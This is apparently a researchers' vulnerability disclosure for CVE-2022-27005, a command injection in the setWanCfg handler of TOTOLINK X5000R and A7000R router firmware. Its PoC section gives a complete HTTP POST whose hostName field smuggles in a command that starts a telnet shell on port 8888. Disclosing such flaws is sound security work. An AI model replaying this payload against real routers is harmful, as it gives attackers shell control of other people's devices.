Headline
CVE-2022-27005: my_vuln/30.md at main · wudipjq/my_vuln
Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the setWanCfg function via the hostName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.
TOTOLINK Vulnerability
Vendor:TOTOLINK
Product:X5000R,A7000R
Version:X5000R_Firmware(V9.1.0u.6118_B20201102)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/218/ids/36.html)
A7000R_Firmware(V9.1.0u.6115_B20201022)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/171/ids/36.html)
Type:Remote Command Execution
Author:Jiaqian Peng,Mengjie Sun,Jingfei Bian
Institution:[email protected],[email protected],[email protected]
Vulnerability description
We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently,allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In cstecgi.cgi
binary:
In setWanCfg
function, hostName
is directly passed by the attacker, so we can control the hostName
to attack the OS.
Supplement
In order to avoid such problems, we believe that the string content should be checked in the input extraction part.
PoC
We set hostName
as ‘;telnetd -l /bin/sh -p 8888;’ , and the router will excute it,such as:
POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 185 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/basic/wan.html?time=1646750305946 Cookie: SESSION_ID=2:1646750253:2
{"hostName":"’;telnetd -l /bin/sh -p 8888;’","dhcpMtu":"1500","proto":1,"dnsMode":"0","ttlWay":"1","lcpEchoEnable":"1","clone":0,"cloneMac":"5C:92:5E:9B:EC:E1","topicurl":"setWanCfg"}
Result
Get a shell!